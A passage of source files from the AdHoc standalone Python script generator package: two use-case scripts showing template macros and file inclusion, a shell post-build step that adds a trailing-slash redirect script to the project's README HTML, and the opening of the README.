    '# <:' 'adhoc_uncomment:>\n'
    '# o:' 'adhoc_template:>\n'
    '# i:' 'adhoc_template:>\n'
    )
# @:adhoc_template:@
# (The bare strings between the '-macros' template sections document the
# macro expansions; they are intentionally outside the template.)
"""
**Complete Example**
Macro::
# @|:uc_descr_beg...:|>
# INPUT
# @|:uc_descr_out...:|>
# OUTPUT
# @|:uc_descr_end...:|>
Effective input source::
# <:adhoc_uncomment...:>
# <:adhoc_template...:>
# INPUT
# <:adhoc_template...:>
# OUTPUT
# <:adhoc_uncomment...:>
Effective output source::
# <:adhoc_uncomment...:>
# <:adhoc_template...:>
# <:adhoc_template...:>
# INPUT
# <:adhoc_template...:>
# OUTPUT
# <:adhoc_template...:>
# <:adhoc_uncomment...:>
**uc_descr_beg Only**
Effective input source::
# <:adhoc_uncomment...:>
# <:adhoc_template...:>
Effective output source::
# <:adhoc_uncomment...:>
# <:adhoc_template...:>
# <:adhoc_template...:>
"""
# @:adhoc_template:@ -macros
uc_descr_out = (
    '# i:' 'adhoc_template:>\n'
    )
# @:adhoc_template:@
"""
Effective input source::
# <:adhoc_template...:>
Effective output source::
# <:adhoc_template...:>
"""
# @:adhoc_template:@ -macros
uc_descr_end = (
    '# o:' 'adhoc_template:>\n'
    '# <:' 'adhoc_uncomment:>\n'
    )
# @:adhoc_template:@
"""
Effective input source::
# <:adhoc_uncomment...:>
Effective output source::
# <:adhoc_template...:>
# <:adhoc_uncomment...:>
"""
# @:adhoc_template:@ -macros
uc_code_beg = (
    '# i:' 'adhoc_indent:> 4\n'
    '# <:' 'adhoc_template:>\n'
    )
# @:adhoc_template:@
"""
For the --template run, indentation is dropped!
Otherwise, input and output versions are identical.
"""
# @:adhoc_template:@ -macros
uc_code_end = (
    '# <:' 'adhoc_template:>\n'
    '# i:' 'adhoc_indent:>\n'
    )
# @:adhoc_template:@
# @:adhoc_template:@ -macros
macros = {
    'uc_descr_beg': uc_descr_beg,
    'uc_descr_out': uc_descr_out,
    'uc_descr_end': uc_descr_end,
    'uc_code_beg': uc_code_beg,
    'uc_code_end': uc_code_end,
    }
# @:adhoc_template:@
# --------------------------------------------------
# |||:sec:||| Generator
# --------------------------------------------------
def catch_stdout(): # ||:fnc:||
    """Redirect `sys.stdout` into an in-memory string buffer.

    :returns: a state tuple ``(previous_stdout, buffer)`` that must be
      passed to :func:`restore_stdout` to retrieve the output as string.
    """
    global _AdHocStringIO
    if '_AdHocStringIO' not in globals():
        _AdHocStringIO = adhoc._AdHocStringIO
    buffer_ = _AdHocStringIO()
    previous_stdout = sys.stdout
    sys.stdout = buffer_
    return (previous_stdout, buffer_)
def restore_stdout(state): # ||:fnc:||
    """Undo :func:`catch_stdout` and return the captured output.

    :returns: captured output as string.
    :param state: state tuple obtained from :func:`catch_stdout`.
    """
    previous_stdout, buffer_ = state
    sys.stdout = previous_stdout
    captured = buffer_.getvalue()
    buffer_.close()
    return captured
def main(argv):
    '''compiler and help/example/documentation extractor

    :returns: non-zero if a command line option was fully handled (the
      caller is expected to exit successfully), 0 to let the script
      continue.
    '''
    global RtAdHoc
    # Make the `uc_*` macros available to the template machinery.
    RtAdHoc.macros = macros
    if len(argv) > 1:
        if argv[1].startswith('-h') or argv[1].startswith('--h'):
            print(__doc__)
            return 1
        if (argv[1] == '--test'):
            import doctest
            doctest.testmod()
            return 0
        # @:adhoc_enable:@
        # if (argv[1].startswith('--e')):
        #     export_dir = '__use_case_export__'
        #     import shutil
        #     if os.path.exists(export_dir):
        #         shutil.rmtree(export_dir)
        #     RtAdHoc.export_dir = export_dir
        #     RtAdHoc.export(__file__)
        #     return 0
        # @:adhoc_enable:@
        if (argv[1].startswith('--c')
            or argv[1].startswith('--d')
            or argv[1].startswith('--t')):
            file_, source = RtAdHoc.std_source_param(__file__)
            if 'adhoc' not in globals() and 'rt_adhoc' not in globals():
                # Running the compiled script: the raw text *is* the
                # compiled form; recover the original source from it.
                compiled = source
                source = RtAdHoc.export_source(source)
            else:
                if 'adhoc' not in globals():
                    # this will most certainly fail
                    from adhoc import AdHoc as RtAdHoc
                    RtAdHoc.macros = macros
                compiled = None
            if argv[1].startswith('--t'):
                if len(argv) > 2:
                    name = argv[2]
                    # BUG FIX: this used `source=docu_input`, but
                    # `docu_input` is only assigned further below, so
                    # `--template NAME` always died with a NameError.
                    # Named templates (e.g. `-macros`) are tagged with
                    # the default delimiters, so extract them from the
                    # unprocessed source.
                    docu_input = RtAdHoc.get_named_template(name, source=source)
                    sys.stdout.write(docu_input)
                    return 1
                # switch to meta tags
                sv = RtAdHoc.set_delimiters(('<:', ':>'))
                docu_input = RtAdHoc.activate_macros(source)
                docu_input = docu_input.replace('t:' 'adhoc_', '<:' 'adhoc_')
                docu_input = docu_input.replace('u:' 'adhoc_', '@:' 'adhoc_')
                docu_input = RtAdHoc.get_named_template(source=docu_input)
                docu_input = RtAdHoc.line_tag_remove(docu_input, '[^:]+', True, ('o:', ':>'))
                docu_input = RtAdHoc.line_tag_remove(docu_input, '[^:]+', True, ('i:', ':>'))
                RtAdHoc.write_source('-', docu_input)
                RtAdHoc.reset_delimiters(sv)
                return 1
            if compiled is None:
                compiled = RtAdHoc().compile(source)
            if argv[1].startswith('--c'):
                RtAdHoc.write_source('-', compiled)
                return 1
            if argv[1].startswith('--d'):
                # Re-run ourselves to capture the `--template` output;
                # it becomes the `adhoc_x_script` substitution below.
                state = catch_stdout()
                main('script --template'.split())
                script = restore_stdout(state)
                # switch to meta tags
                sv = RtAdHoc.set_delimiters(('<:', ':>'))
                indent_tag_sym = 'adhoc_indent'
                indent_tag = RtAdHoc.section_tag(indent_tag_sym)
                script = ''.join((
                    '# ' + indent_tag + ' 4\n',
                    script,
                    '# ' + indent_tag + '\n',
                    ))
                script = RtAdHoc.indent_sections(script, indent_tag_sym)
                script = RtAdHoc.section_tag_remove(script, indent_tag_sym)
                docu_input = RtAdHoc.activate_macros(source)
                docu_input = docu_input.replace(RtAdHoc.section_tag('adhoc_x_script'), script.rstrip())
                docu_input = docu_input.replace('i:' 'adhoc_', '<:' 'adhoc_')
                docu_input = docu_input.replace('u:' 'adhoc_', '@:' 'adhoc_')
                docu_input = RtAdHoc.get_named_template(source=docu_input)
                docu_input = RtAdHoc.line_tag_remove(docu_input, '[^:]+', True, ('o:', ':>'))
                RtAdHoc.write_source('-', docu_input)
                # Second pass: document the compiled variant as well.
                compiled = RtAdHoc.activate_macros(compiled)
                docu_input = compiled
                docu_input = docu_input.replace('i:' 'adhoc_', '<:' 'adhoc_')
                docu_input = docu_input.replace('o:' 'adhoc_', '<:' 'adhoc_')
                docu_input = docu_input.replace('u:' 'adhoc_', '@:' 'adhoc_')
                docu_input = RtAdHoc.get_named_template(source=docu_input)
                RtAdHoc.write_source('-', docu_input)
                RtAdHoc.reset_delimiters(sv)
                return 1
        # BUG FIX: `map` is lazy in Python 3, so the original
        # `map(sys.stderr.write, ...)` never emitted anything.
        sys.stderr.write(''.join(('error: unknown option `', str(argv[1]), '`\n')))
        exit(1)
    return 0
# --------------------------------------------------
# |||:sec:||| Script
# --------------------------------------------------
# --------------------------------------------------
# @|:uc_descr_beg:|>
# **Overview**
#
# The entire initialization code looks like this::
#
# <:adhoc_x_script:>
#
# **Uncompiled Script**
#
# The script starts with the AdHoc run-time declaration ::
#
# @|:uc_descr_out:|>
# **Compiled Script**
#
# After adhoc compilation, the run-time class is added and the script
# is modified to::
#
# @|:uc_descr_end:|>
### show code for input only:
# @|:uc_code_beg:|>
# o:adhoc_template:>
# @:adhoc_run_time:@
# o:adhoc_template:>
# @|:uc_code_end:|>
### show description as code for output only:
# i:adhoc_indent:> 4
# @|:uc_descr_beg:|>
# @|:uc_descr_out:|>
# class RtAdHoc (object):
# ...
# @|:uc_descr_end:|>
# i:adhoc_indent:>
# --------------------------------------------------
# @|:uc_descr_beg:|>
# The uncompiled script uses modules :mod:`adhoc` or :mod:`rt_adhoc`
# for class :class:`RtAdHoc`.
#
# @|:uc_descr_out:|>
# Since :class:`RtAdHoc` is incorporated verbatim, there is no need to
# import :mod:`adhoc` or :mod:`rt_adhoc` anymore::
#
# @|:uc_descr_end:|>
# NOTE(review): the `# @|:...:|>` lines below are AdHoc macro calls and
# the `# @:adhoc_disable:@` pair marks code that the compiler comments
# out; all of these comments are functional and must stay byte-exact.
# --------------------------------------------------
# @|:uc_descr_beg:|>
#
# Add executable search path to Python module search path::
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# @|:uc_code_beg:|>
# @:adhoc_disable:@
import os
import sys
os_path = os.defpath
if 'PATH' in os.environ:
    os_path = os.environ['PATH']
sys_path = sys.path
sys.path.extend(os_path.split(os.pathsep))
# @|:uc_code_end:|>
# The try/import chain below resolves RtAdHoc from either `adhoc` or an
# exported `rt_adhoc` module; if both are missing the script still loads.
# --------------------------------------------------
# @|:uc_descr_beg:|>
#
# Import :mod:`adhoc` and use class :class:`adhoc.AdHoc` as
# :class:`RtAdHoc`::
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# @|:uc_code_beg:|>
try:
    import adhoc
    from adhoc import AdHoc as RtAdHoc
# @|:uc_code_end:|>
# --------------------------------------------------
# @|:uc_descr_beg:|>
#
# Use exported :mod:`rt_adhoc` module, if :mod:`adhoc` is not
# available::
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# @|:uc_code_beg:|>
except ImportError:
    try:
        import rt_adhoc
        from rt_adhoc import RtAdHoc
# @|:uc_code_end:|>
# --------------------------------------------------
# @|:uc_descr_beg:|>
#
# Let the script continue, even if :class:`RtAdHoc` is not available:
#
# ::
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# @|:uc_code_beg:|>
    except ImportError:
        pass
# @|:uc_code_end:|>
# --------------------------------------------------
# @|:uc_descr_beg:|>
#
# Restore the standard module search path::
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# @|:uc_code_beg:|>
sys.path = sys_path
# @:adhoc_disable:@
# @|:uc_code_end:|>
# --------------------------------------------------
# generator meta program
# `main` returns non-zero when it fully handled a command line option,
# in which case the script exits immediately with status 0.  When
# imported as a module, nothing is executed.
if __name__ == '__main__':
    as_module = False
    main(sys.argv) and exit(0)
else:
    as_module = True
if not as_module:
    pass
# --------------------------------------------------
# @|:uc_descr_beg:|>
# From here on, RtAdHoc can be used for both the uncompiled and compiled version of the script.
#
# @|:uc_descr_out:|>
# The rest of the script is unmodified.
#
# @|:uc_descr_end:|>
# :ide: COMPILE: Run with --template macros
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --template macros")))
# :ide: COMPILE: Run with --compile
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --compile")))
# :ide: COMPILE: Run with --export; diff
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --export; diff -u use_case_000_.py __use_case_export__/" (file-name-nondirectory (buffer-file-name)))))
# :ide: COMPILE: Run with --compile >use_case_000.py && --export && diff && rm
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --compile >use_case_000.py && python use_case_000.py --export && diff -u use_case_000_.py __use_case_export__/use_case_000.py && rm -rf __use_case_export__")))
# :ide: COMPILE: Run with --compile >use_case_000.py
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --compile >use_case_000.py")))
# :ide: COMPILE: Run with --template
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --template")))
# :ide: COMPILE: Run with --doc
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --doc")))
# :ide: COMPILE: Run with --doc | diff
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --doc | ( if test -r uc000; then echo 'DIFF'; diff -u uc000 -; else echo 'STORE'; cat >uc000; fi)")))
# :ide: COMPILE: Run with --help
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --help")))
# :ide: COMPILE: Run with python3
# . (progn (save-buffer) (compile (concat "python3 ./" (file-name-nondirectory (buffer-file-name)) "")))
# :ide: COMPILE: Run w/o args
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) "")))
# :ide: +-#+
# . Compile ()
#
# Local Variables:
# mode: python
# comment-start: "#"
# comment-start-skip: "#+"
# comment-column: 0
# truncate-lines: t
# End: | AdHoc | /AdHoc-0.3.2.tar.gz/AdHoc-0.3.2/use_case_000_.py | use_case_000_.py |
# --------------------------------------------------
# @|:uc_descr_beg:|>
# Included Files
# --------------
#
# Included files are optionally zipped and base64-encoded. They can
# be automatically unpacked, or unpacked via the
# :meth:`adhoc.AdHoc.extract` and
# :meth:`adhoc.AdHoc.get_named_template` mechanisms.
#
# The following Python script includes the files ``include1`` and
# ``include2``. ``include1`` is automatically unpacked, if it does
# not already exist, whereas ``include2`` is only available for
# explicit extraction.
#
# @|:uc_descr_out:|>
# @|:uc_descr_end:|>
# --------------------------------------------------
# |||:sec:||| Generator
# --------------------------------------------------
# Macro expansion fragments.  Each `uc_*` string is a block of AdHoc
# section tags; the delimiters are split across adjacent string
# literals so that this source file does not tag itself.  The
# `beg`/`out`/`end` triples open, switch and close description
# (`uc_descr_*`) and template/output/input (`uc_code_ti_*`) blocks.
uc_descr_beg = (
    '# <:' 'adhoc_uncomment:>\n'
    '# o:' 'adhoc_template:>\n'
    '# i:' 'adhoc_template:>\n'
    )
uc_descr_out = (
    '# i:' 'adhoc_template:>\n'
    )
uc_descr_end = (
    '# o:' 'adhoc_template:>\n'
    '# <:' 'adhoc_uncomment:>\n'
    )
uc_code_beg = (
    '# i:' 'adhoc_indent:> 4\n'
    '# <:' 'adhoc_template:>\n'
    )
uc_code_end = (
    '# <:' 'adhoc_template:>\n'
    '# i:' 'adhoc_indent:>\n'
    )
uc_code_ti_beg = (
    '# t:' 'adhoc_template:>\n'
    '# o:' 'adhoc_template:>\n'
    '# i:' 'adhoc_template:>\n'
    )
uc_code_ti_out = (
    '# i:' 'adhoc_template:>\n'
    )
uc_code_ti_end = (
    '# o:' 'adhoc_template:>\n'
    '# t:' 'adhoc_template:>\n'
    )
# Name -> expansion mapping installed as `RtAdHoc.macros` in `main`.
macros = {
    'uc_descr_beg': uc_descr_beg,
    'uc_descr_out': uc_descr_out,
    'uc_descr_end': uc_descr_end,
    'uc_code_beg': uc_code_beg,
    'uc_code_end': uc_code_end,
    'uc_code_ti_beg': uc_code_ti_beg,
    'uc_code_ti_out': uc_code_ti_out,
    'uc_code_ti_end': uc_code_ti_end,
    }
# Sample payloads for the `include1`/`include2` demo files that `main`
# writes before compiling and removes afterwards.
# NOTE(review): INCLUDE1 declares latin1 coding but is written out
# UTF-8 encoded by `main` -- presumably intentional for the demo;
# confirm.
INCLUDE1 = """\
# -*- coding: latin1 -*-
abc äöü
fill it up a little ...
"""
INCLUDE2 = """\
# -*- coding: utf-8 -*-
abc äöü
fill it up a little ...
"""
# File name -> payload for the files referenced by the
# `u:adhoc_include:@` tags in the script section below.
INCLUDES = {
    'include1': INCLUDE1,
    'include2': INCLUDE2,
    }
def main(argv):
    '''compiler and help/example/documentation extractor

    :returns: non-zero if a command line option was fully handled (the
      caller is expected to exit successfully), 0 to let the script
      continue.
    '''
    global RtAdHoc
    # Make the `uc_*` macros available to the template machinery.
    RtAdHoc.macros = macros
    if len(argv) > 1:
        if argv[1].startswith('-h') or argv[1].startswith('--h'):
            print(__doc__)
            return 1
        if (argv[1].startswith('--c')
            or argv[1].startswith('--d')
            or argv[1].startswith('--t')):
            file_, source = RtAdHoc.std_source_param(__file__)
            if 'adhoc' not in globals() and 'rt_adhoc' not in globals():
                # Running the compiled script: the raw text *is* the
                # compiled form; recover the original source from it.
                compiled = source
                source = RtAdHoc.export_source(source)
            else:
                if 'adhoc' not in globals():
                    # this will most certainly fail
                    from adhoc import AdHoc as RtAdHoc
                    RtAdHoc.macros = macros
                compiled = None
            if argv[1].startswith('--t'):
                # switch to meta tags
                sv = RtAdHoc.set_delimiters(('<:', ':>'))
                docu_input = RtAdHoc.activate_macros(source)
                docu_input = docu_input.replace('t:' 'adhoc_', '<:' 'adhoc_')
                docu_input = docu_input.replace('u:' 'adhoc_', '@:' 'adhoc_')
                docu_input = RtAdHoc.get_named_template(source=docu_input)
                docu_input = RtAdHoc.line_tag_remove(docu_input, '[^:]+', True, ('o:', ':>'))
                docu_input = RtAdHoc.line_tag_remove(docu_input, '[^:]+', True, ('i:', ':>'))
                RtAdHoc.write_source('-', docu_input)
                RtAdHoc.reset_delimiters(sv)
                return 1
            if compiled is None:
                # Materialize the demo include files for compilation,
                # remembering which ones this run actually created.
                created = []
                for include, isource in INCLUDES.items():
                    if not os.path.exists(include):
                        if hasattr(isource, 'decode'):
                            # Python 2: write unicode, not raw bytes.
                            isource = isource.decode('utf-8')
                        RtAdHoc.write_source(include, isource)
                        created.append(include)
                compiled = RtAdHoc().compile(source.replace('u:' 'adhoc_', '@:' 'adhoc_'))
                # BUG FIX: previously every INCLUDES entry was
                # unlinked, silently deleting pre-existing files that
                # this run never wrote.
                for include in created:
                    os.unlink(include)
            if argv[1].startswith('--c'):
                RtAdHoc.write_source('-', compiled.replace('@:' 'adhoc_', 'u:' 'adhoc_'))
                return 1
            if argv[1].startswith('--d'):
                # switch to meta tags
                sv = RtAdHoc.set_delimiters(('<:', ':>'))
                docu_input = RtAdHoc.activate_macros(source)
                docu_input = docu_input.replace('i:' 'adhoc_', '<:' 'adhoc_')
                docu_input = docu_input.replace('u:' 'adhoc_', '@:' 'adhoc_')
                docu_input = RtAdHoc.get_named_template(source=docu_input)
                docu_input = RtAdHoc.line_tag_remove(docu_input, '[^:]+', True, ('o:', ':>'))
                RtAdHoc.write_source('-', docu_input)
                # Second pass: document the compiled variant as well.
                docu_input = RtAdHoc.activate_macros(compiled)
                docu_input = docu_input.replace('i:' 'adhoc_', '<:' 'adhoc_')
                docu_input = docu_input.replace('o:' 'adhoc_', '<:' 'adhoc_')
                docu_input = docu_input.replace('u:' 'adhoc_', '@:' 'adhoc_')
                docu_input = RtAdHoc.get_named_template(source=docu_input)
                RtAdHoc.write_source('-', docu_input)
                RtAdHoc.reset_delimiters(sv)
                return 1
        # BUG FIX: `map` is lazy in Python 3, so the original
        # `map(sys.stderr.write, ...)` never emitted anything.
        sys.stderr.write(''.join(('error: unknown option `', str(argv[1]), '`\n')))
        exit(1)
    return 0
# --------------------------------------------------
# |||:sec:||| Script
# --------------------------------------------------
# --------------------------------------------------
# @|:uc_descr_beg:|>
# **Uncompiled Script**
#
# The script starts with `Generic AdHoc Initialization`_::
#
# @|:uc_descr_out:|>
# **Compiled Script**
#
# @|:uc_descr_end:|>
# NOTE(review): the block below is the generic AdHoc initialization
# boilerplate, wrapped in functional template/indent tags and a
# `@:adhoc_disable:@` pair; every comment in it must stay byte-exact.
# i:adhoc_indent:> 4
# @|:uc_code_ti_beg:|>
# @:adhoc_run_time:@
# @:adhoc_disable:@
# Get RtAdHoc from adhoc or rt_adhoc
import os
import sys
os_path = os.defpath
if 'PATH' in os.environ:
    os_path = os.environ['PATH']
sys_path = sys.path
sys.path.extend(os_path.split(os.pathsep))
try:
    import adhoc
    from adhoc import AdHoc as RtAdHoc
except ImportError:
    try:
        import rt_adhoc
        from rt_adhoc import RtAdHoc
    except ImportError:
        pass
sys.path = sys_path
# @:adhoc_disable:@
# @|:uc_code_ti_out:|>
# @|:uc_code_ti_end:|>
# i:adhoc_indent:>
# meta program
# `main` returns non-zero when it fully handled a command line option,
# in which case the script exits immediately with status 0.  When
# imported as a module, nothing is executed.
if __name__ == '__main__':
    as_module = False
    main(sys.argv) and exit(0)
else:
    as_module = True
if not as_module:
    pass
# NOTE(review): the `t:`/`<:`-tagged comment lines below are functional
# AdHoc tags (template extraction, indent control); keep them byte-exact.
# t:adhoc_indent:> -4
# --------------------------------------------------
# @|:uc_descr_beg:|>
# ``include1`` is marked for inclusion at compile time. Since it is
# supposed to exist anyway, no special care is taken to extract it in
# the uncompiled script::
#
# @|:uc_descr_out:|>
# ``include1`` is automatically extracted in the compiled script::
#
# @|:uc_descr_end:|>
# <:adhoc_template:>
# u:adhoc_include:@ include1
# <:adhoc_template:>
# --------------------------------------------------
# @|:uc_descr_beg:|>
# ``include2`` is marked for inclusion at compile time::
#
# @|:uc_descr_out:|>
# The ``if False`` before ``include2`` prevents automatic extraction::
#
# @|:uc_descr_end:|>
# <:adhoc_template:>
if False:
    pass
    # u:adhoc_include:@ include2
# <:adhoc_template:>
# Temporarily install `u:`/`:@` as section delimiters so that
# `extract` below can find the compiled `adhoc_unpack` sections.
sv = RtAdHoc.section_delimiters
RtAdHoc.section_delimiters = ('u:', ':@')
# --------------------------------------------------
# @|:uc_descr_beg:|>
# There is actually nothing to extract in the uncompiled script::
#
# @|:uc_descr_out:|>
# In the compiled script, ``include2`` will now also be extracted,
# since :meth:`adhoc.AdHoc.extract` finds all sections tagged with
# ``adhoc_unpack``::
#
# @|:uc_descr_end:|>
# <:adhoc_template:>
RtAdHoc.quiet = True
RtAdHoc.extract(__file__)
# <:adhoc_template:>
# Restore the caller's section delimiters.
RtAdHoc.section_delimiters = sv
# --------------------------------------------------
# t:adhoc_indent:>
# :ide: COMPILE: Run with --compile
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --compile")))
# :ide: COMPILE: Run with --compile >use_case_002_include.py
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --compile >use_case_002_include.py")))
# :ide: COMPILE: Run with --template
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --template")))
# :ide: COMPILE: Run with --doc
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --doc")))
# :ide: COMPILE: Run with --doc | diff
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --doc | ( if test -r uc002; then echo 'DIFF'; diff -u uc002 -; else echo 'STORE'; cat >uc002; fi)")))
# :ide: COMPILE: Run with --help
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --help")))
# :ide: COMPILE: Run with python3
# . (progn (save-buffer) (compile (concat "python3 ./" (file-name-nondirectory (buffer-file-name)) "")))
# :ide: COMPILE: Run w/o args
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) "")))
# :ide: +-#+
# . Compile ()
#
# Local Variables:
# mode: python
# comment-start: "#"
# comment-start-skip: "#+"
# comment-column: 0
# truncate-lines: t
# End: | AdHoc | /AdHoc-0.3.2.tar.gz/AdHoc-0.3.2/use_case_002_include_.py | use_case_002_include_.py |
# z-massage-index.sh - Add stuff to HTML (post-build step)
# usage: z-massage-index.sh [file ...]
#
# Example:
# z-massage-index.sh <README.html >index.html
# Copyright (C) 2012, Wolfgang Scherer, <Wolfgang.Scherer at gmx.de>
#
# This file is part of Adhoc.
#
: # script help
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>,
# or write to Wolfgang Scherer, <Wolfgang.Scherer at gmx.de>
# --------------------------------------------------
# |||:sec:||| FUNCTIONS
# --------------------------------------------------
# Print the usage text: prefer the external `script-help` helper; fall
# back to sed-extracting the comment block that starts at line 3 of
# this script and ends before the first non-comment line.
usage ()
{
    script_help="script-help"
    ( "${script_help}" ${1+"$@"} "${0}" ) 2>/dev/null \
        || ${SED__PROG-sed} -n '3,/^[^#]/{;/^[^#]/d;p;}' "${0}";
}
# (progn (forward-line 1)(snip-insert-mode "^sh_f.awk_var_escape_setup$" t))
# Double each backslash, for awk implementations that interpret
# backslashes in `-v var=value` assignments.
bs_escape ()
{
    printf "%s\n" "${*}" | ${SED__PROG-sed} 's,\\,\\\\,g'
}
# Pass the value through unchanged, for awk implementations (mawk)
# that do not interpret backslashes in `-v` assignments.
no_bs_escape ()
{
    printf "%s\n" "${*}"
}
# Probe the available awk to decide whether `-v` values need backslash
# escaping; sets the global `escape_it` to the name of the appropriate
# escape function and exits with an error if neither probe round-trips.
awk_var_escape_setup ()
{
    # It seems most awk's interpret backslashes in `-v var=value',
    # however, mawk(1) does not
    # |:DBG:| escape_it (original-awk): [bs_escape]
    # |:DBG:| escape_it (awk)         : [bs_escape]
    # |:DBG:| escape_it (gawk)        : [bs_escape]
    # |:DBG:| escape_it (nawk)        : [bs_escape]
    # |:DBG:| escape_it (mawk)        : [no_bs_escape]
    escape_it="no_bs_escape"
    AWK_VAR_ESCAPE_CHECK="${1-'\.'}"
    AWK_VAR_ESCAPE_RESULT="$( ${AWK__PROG-awk} -v check="${AWK_VAR_ESCAPE_CHECK}" -- 'BEGIN { print check; }' 2>/dev/null </dev/null )"
    test x"${AWK_VAR_ESCAPE_CHECK}" = x"${AWK_VAR_ESCAPE_RESULT}" || escape_it="bs_escape"
    AWK_VAR_ESCAPE_RESULT="$( ${AWK__PROG-awk} -v check="$( ${escape_it} "${AWK_VAR_ESCAPE_CHECK}" )" -- 'BEGIN { print check; }' 2>/dev/null </dev/null )"
    if test x"${AWK_VAR_ESCAPE_CHECK}" != x"${AWK_VAR_ESCAPE_RESULT}"
    then
        printf >&2 "%s\n" 'error: get another awk(1).'
        exit 1
    fi
}
# Dispatch --help/--docu before doing any work.
test x"${1+set}" = xset && \
case "${1}" in
-\?|-h|--help) usage; exit 0;;
--docu) usage --full; exit 0;;
esac
# --------------------------------------------------
# |||:sec:||| MAIN
# --------------------------------------------------
# JavaScript snippet to inject right after the opening <head> tag.
# Quoting: each embedded single quote is written as '\'' inside the
# single-quoted shell string -- do not reformat.
JS_BITBUCKET='<script type="text/javascript"><!--
// Add a trailing slash to the URL, if it does not end in `.html'\'' or `/'\''.
// Elegant solution from David Chambers [Atlassian]
if (!/(\.html|\/)$/.test(location.pathname)) {
    location.pathname += '\''/'\'';
}
//--></script>'
# |:here:|
# Decide whether JS_BITBUCKET needs backslash escaping for this awk.
awk_var_escape_setup "${JS_BITBUCKET}"
# Copy stdin (or the file arguments) to stdout, emitting JS_BITBUCKET
# after every line containing an opening <head> tag.
${AWK__PROG-awk} -v JS_BITBUCKET="$( ${escape_it} "${JS_BITBUCKET}" )" -- '
{
    print;
}
/<[Hh][Ee][Aa][Dd][^>]*>/ {
    print JS_BITBUCKET;
}
' ${1+"$@"}
exit # |||:here:|||
#
# :ide-menu: Emacs IDE Main Menu - Buffer @BUFFER@
# . M-x `eIDE-menu' (eIDE-menu "z")
# :ide: SNIP: insert OPTION LOOP
# . (snip-insert-mode "sh_b.opt-loop" nil t)
# :ide: SHELL: Run with --docu
# . (progn (save-buffer) (shell-command (concat "sh " (file-name-nondirectory (buffer-file-name)) " --docu")))
# :ide: SHELL: Run with --help
# . (progn (save-buffer) (shell-command (concat "sh " (file-name-nondirectory (buffer-file-name)) " --help")))
# :ide: SHELL: Run w/o args
# . (progn (save-buffer) (shell-command (concat "sh " (file-name-nondirectory (buffer-file-name)) " ")))
# :ide: COMPILE: Run with `cat README.html | ... | tee index.html | diff'
# . (progn (save-buffer) (compile (concat "cat README.html | python ./" (file-name-nondirectory (buffer-file-name)) " | tee index.html | diff -ubB README.html -")))
# :ide: COMPILE: Run with `cat README.html | ... | tee index.html | diff'
# . (progn (save-buffer) (compile (concat "cat README.html | sh ./" (file-name-nondirectory (buffer-file-name)) " | tee index.html | diff -ubB README.html -")))
#
# Local Variables:
# mode: sh
# comment-start: "#"
# comment-start-skip: "#+"
# comment-column: 0
# End:
# mmm-classes: (here-doc ide-entries) | AdHoc | /AdHoc-0.3.2.tar.gz/AdHoc-0.3.2/doc/z-massage-index.sh | z-massage-index.sh |
AdHoc Standalone Python Script Generator
########################################
The *AdHoc* compiler can be used as a program (see `Script Usage`_)
as well as a module (see :class:`adhoc.AdHoc`).
Since the *AdHoc* compiler itself is installed as a compiled *AdHoc*
script, it serves as its own usage example.
After installation of the *adhoc.py* script, the full source can be
obtained in directory ``__adhoc__``, by executing::
adhoc.py --explode
.. @@contents@@
Purpose
=======
*AdHoc* provides python scripts with
- template facilities
- default file generation
- standalone module inclusion
See also `Use Cases`_.
*AdHoc* has been designed to provide an implode/explode cycle:
======== ======= ========= ======= =========
source_0 xsource_0
source_1 implode explode xsource_1
... ------> script.py ------> ...
source_n xsource_n
======== ======= ========= ======= =========
where ``xsource_i === source_i``. I.e., ``diff source_i xsource_i``
does not produce any output.
Quickstart
==========
module.py:
| # -\*- coding: utf-8 -\*-
| mvar = 'value'
script.py:
| # -\*- coding: utf-8 -\*-
| # |adhoc_run_time|
| import module # |adhoc|
| print('mvar: ' + module.mvar)
Compilation::
adhoc.py --compile script.py >/tmp/script-compiled.py
Execution outside source directory::
cd /tmp && python script-compiled.py
shows::
mvar: value
Decompilation::
cd /tmp && \
mkdir -p __adhoc__ && \
adhoc.py --decompile <script-compiled.py >__adhoc__/script.py
.. |@:| replace:: ``@:``
.. |:@| replace:: ``:@``
.. |adhoc_run_time| replace:: |@:|\ ``adhoc_run_time``\ |:@|
.. |adhoc| replace:: |@:|\ ``adhoc``\ |:@|
Description
===========
The *AdHoc* compiler/decompiler parses text for tagged lines and
processes them as instructions.
The minimal parsed entity is a tagged line, which is any line
containing a recognized *AdHoc* tag.
